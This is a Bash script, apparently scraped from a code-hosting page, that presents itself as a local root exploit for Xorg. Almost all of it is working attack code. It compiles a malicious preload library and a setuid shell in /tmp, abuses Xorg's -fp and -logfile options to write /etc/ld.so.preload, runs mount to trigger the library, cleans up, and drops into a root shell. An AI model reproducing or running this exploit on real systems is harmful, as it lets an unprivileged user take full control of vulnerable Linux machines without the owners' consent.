42 lines
1.1 KiB
Bash
42 lines
1.1 KiB
Bash
#!/bin/bash
|
|
# x0rg - Xorg Local Root Exploit
|
|
# Released under the Snitches Get Stitches Public Licence.
|
|
# props to prdelka / fantastic for the shadow vector.
|
|
# Gr33tz to everyone in #lizardhq and elsewhere <3
|
|
# ~infodox (25/10/2018)
|
|
# FREE LAURI LOVE!
|
|
echo "x0rg"
|
|
echo "[+] First, we create our shell and library..."
|
|
cat << EOF > /tmp/libhax.c
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
__attribute__ ((__constructor__))
|
|
void dropshell(void){
|
|
chown("/tmp/rootshell", 0, 0);
|
|
chmod("/tmp/rootshell", 04755);
|
|
unlink("/etc/ld.so.preload");
|
|
printf("[+] done!\n");
|
|
}
|
|
EOF
|
|
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
|
|
rm -f /tmp/libhax.c
|
|
cat << EOF > /tmp/rootshell.c
|
|
#include <stdio.h>
|
|
int main(void){
|
|
setuid(0);
|
|
setgid(0);
|
|
seteuid(0);
|
|
setegid(0);
|
|
execvp("/bin/sh", NULL, NULL);
|
|
}
|
|
EOF
|
|
gcc -o /tmp/rootshell /tmp/rootshell.c
|
|
rm -f /tmp/rootshell.c
|
|
echo "[+] Hack the planet!"
|
|
cd /etc; Xorg -fp "/tmp/libhax.so" -logfile ld.so.preload :1;
|
|
mount # arbritary setuid we run to pop root
|
|
echo "[+] Tidy up a bit..."
|
|
rm -f /tmp/libhax.so
|
|
echo "[<3] :PPpPpPpOpr000000t!"
|
|
/tmp/rootshell
|